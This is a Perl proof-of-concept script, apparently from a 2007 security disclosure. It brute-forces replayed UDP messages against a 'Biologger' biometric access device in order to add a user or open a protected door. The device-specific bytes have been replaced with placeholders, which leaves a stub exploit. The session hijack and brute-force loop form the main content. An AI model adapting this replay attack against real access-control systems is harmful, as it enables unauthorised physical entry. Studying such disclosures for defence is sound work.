# Biologger - UDP replay POC
#
# M. Lewis, IRM Plc 2007
#
# Actual message bytes have been removed from this POC, as they are specific
# to a unique device. This code serves as a stub example on replaying captured
# and analysed Biologger data, in this example, the transport is UDP, and a
# choice of two replays is available, add a new user to the device, or open the 
# protected door.
#

use IO::Socket;
print ">> Biologger UDP Replay POC <<\n";
unless (@ARGV eq 3) { die "usage: $0 <device-IP> <device-port> <action=1 add user OR 2 open door>" }

my $device = shift(@ARGV);
my $device_port = shift(@ARGV);
my $option = shift(@ARGV);

my $sock = new IO::Socket::INET (
				PeerAddr => $device,
				PeerPort => $device_port,
				Proto => 'udp',
				LocalPort => 7777
				);
				
die "Error creating socket: $!\n" unless $sock;

$probe  = "\x90";	# The probe wake-up call message goes here
$header = "\x90"; 	# Packet header information
$template = "\x90"; 	# Specific biometric template if uploading/swapping biometric
$userinfo = "\x90"; 	# user info to be added to device, requires name, PIN, privilege etc.
$door_id = "\x90"; 	# Door number to be opened

# issue wake-up message
print $sock $probe;

# get device reply
$sock->recv($text,1024);

# extract the session identifier from the response
$sub = substr($text,4,2);

# perform the specified brute-force action
if($option == 1) {
	print "\nSending add user replay messages\n";
	&bf_add_user($sub);
}
if($option == 2) {
	print "\nSending open door replay messages\n";
	&bf_open_door($sub);
} else { 
	print "Invalid action\n"; 
}

close($sock);

#
# brute-force add new user message (MAX 256^2 = 65536 possible combinations)
#
sub bf_add_user {
	$session = shift;
	for($v1 = 0; $v1 < 256; $v1++) {
		for($v2 = 0; $v2 < 256; $v2++) {
			$add = "\x90" . chr($v1) . chr($v2) . $session . $userinfo;
			print $sock $add;
			# invoke a delay to minimise UDP packet loss
			select(undef, undef, undef, 0.001);
		}
	}
	print "\nAdd user brute-force complete. User $userinfo should now be added to device.\n"
}

#
# brute-force open door message (MAX 256^2 = 65536 possible combinations)
#
sub bf_open_door {
	$session = shift;
	for($v1 = 0; $v1 < 256; $v1++) {
		for($v2 = 0; $v2 < 256; $v2++) {
			$open_door = "\x90" . chr($v1) . chr($v2) . $session . $door_id;
			print $sock $open_door;
			# invoke a delay to minimise UDP packet loss
			select(undef, undef, undef, 0.001);
		}
	}
	print "\nOpen door brute-force complete. Door $door_id should now be open.\n"
}